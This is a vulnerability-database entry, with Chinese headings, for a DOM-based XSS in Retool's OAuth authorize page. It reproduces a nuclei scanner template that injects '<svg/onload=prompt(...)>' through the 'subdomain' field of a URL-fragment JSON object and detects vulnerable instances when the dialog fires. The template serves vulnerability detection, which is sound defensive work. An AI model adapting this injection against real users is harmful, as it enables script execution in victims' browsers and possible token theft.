retool-dom-xss: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS

日期: 2025-08-01 | 影响软件: Retool | POC: 已公开

漏洞描述

Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.

PoC代码[已公开]

id: retool-dom-xss

info:
  name: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Retool"
    fofa-query: body="Retool"
  tags: headless,retool,dom,xss

variables:
  random_int: '{{rand_int(1,1000)}}'

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/oauth/authorize#%7B%20"redirectUri":%20"zzz",%20"resourceId":%20"fff",%20"resourceName":%20"aa",%20"resourceType":%20"azz",%20"userEmail":%20"aaa@aa.com",%20"userFirstName":%20"zzz",%20"userLastName":%20"zzff",%20"xsrfToken":%20"x","subdomain":"aaa<svg/onload=prompt({{random_int}})>aaaa","accessToken":"ab"%20%7D'
        action: navigate

      - action: waitdialog
        name: subdomain_object_dom

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - subdomain_object_dom == true
          - subdomain_object_dom_message == random_int
        condition: and
# digest: 4b0a00483046022100876be88889b2e51c152cf7e73e82863ab576633fc7e7a37c0870be8e4491f9e50221008e4431d3b1256e848c69c0a6647869549b78d0b7f145c204632a89a1dbc3f8b5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./headless/vulnerabilities/retool/retool-dom-xss.yaml

相关漏洞推荐